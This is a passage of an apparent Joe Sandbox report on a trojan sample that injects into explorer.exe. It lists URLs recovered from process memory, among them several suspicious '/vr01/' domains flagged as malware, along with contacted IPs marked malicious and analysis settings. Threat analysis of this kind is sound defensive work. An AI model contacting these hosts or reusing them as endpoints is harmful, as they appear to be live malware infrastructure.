                                          http://www.ethicai.pro/vr01/explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.bombslot-42.coexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.yesxoit.xyzReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://android.notify.windows.com/iOSJMexplorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://www.oregonjobs.coexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.owletbaby.shopexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://outlook.comexplorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3842240210.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082075115.000000000BDFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.jupitr-claim.top/vr01/www.nicolbauer.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.jupitr-claim.topexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • 1%, Virustotal, Browse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.nicolbauer.comReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://android.notify.windows.com/iOSZMexplorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.mayorii.comReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.ethicai.pro/vr01/www.owletbaby.shopexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.bombslot-42.co/vr01/www.erabits.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000006.00000000.1362710142.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2300169134.000000000BE2F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2294028232.000000000BDFC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.molobeverello.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.yelp.comexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.mingshengglass.comReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.owletbaby.shopReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.jupitr-claim.topReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.kidscircle.shop/vr01/explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.ethicai.proexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.mingshengglass.com/vr01/www.yoursweets.onlineexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.nicolbauer.com/vr01/explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.yesxoit.xyzexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.jupitr-claim.top/vr01/explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.mingshengglass.com/vr01/explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.yoursweets.online/vr01/www.ethicai.proexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.erabits.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.oregonjobs.co/vr01/www.helyibudapest.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.poseidoncrm.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.nicolbauer.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://schemas.microexplorer.exe, 00000006.00000002.3838517721.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3831292378.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1358564152.0000000007670000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.poseidoncrm.com/vr01/www.yesxoit.xyzexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://parade.com/61481/toriavey/where-did-hamburgers-originateexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.yoursweets.online/vr01/explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              http://www.mayorii.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.erabits.comReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.molobeverello.comReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.molobeverello.com/vr01/explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://api.msn.com/~Texplorer.exe, 00000006.00000002.3838977700.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-oexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.elcaporalburley.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.bombslot-42.co/vr01/explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.kidscircle.shopexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.helyibudapest.comexplorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://www.bombslot-42.coReferer:explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            13.248.169.48
                                                                                            www.owletbaby.shopUnited States
                                                                                            16509AMAZON-02UStrue
                                                                                            172.67.154.171
                                                                                            www.helyibudapest.comUnited States
                                                                                            13335CLOUDFLARENETUStrue
                                                                                            102.134.40.151
                                                                                            www.mingshengglass.comSouth Africa
                                                                                            328543sun-asnSCtrue
                                                                                            3.33.130.190
                                                                                            ethicai.proUnited States
                                                                                            8987AMAZONEXPANSIONGBtrue
                                                                                            104.21.56.10
                                                                                            www.bombslot-42.coUnited States
                                                                                            13335CLOUDFLARENETUStrue
                                                                                            66.147.240.91
                                                                                            oregonjobs.coUnited States
                                                                                            46606UNIFIEDLAYER-AS-1UStrue
                                                                                            Joe Sandbox version:40.0.0 Tourmaline
                                                                                            Analysis ID:1422327
                                                                                            Start date and time:2024-04-08 15:21:33 +02:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 11m 47s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:15
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:1
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:hj3YCvtlg7.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:4850a766fab45d5947075658d9c6bbf4b970f0d05b082c1472b93d9a7fa3d093.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.evad.winEXE@12/1@11/6
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 95%
                                                                                            • Number of executed functions: 98
                                                                                            • Number of non-executed functions: 312
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
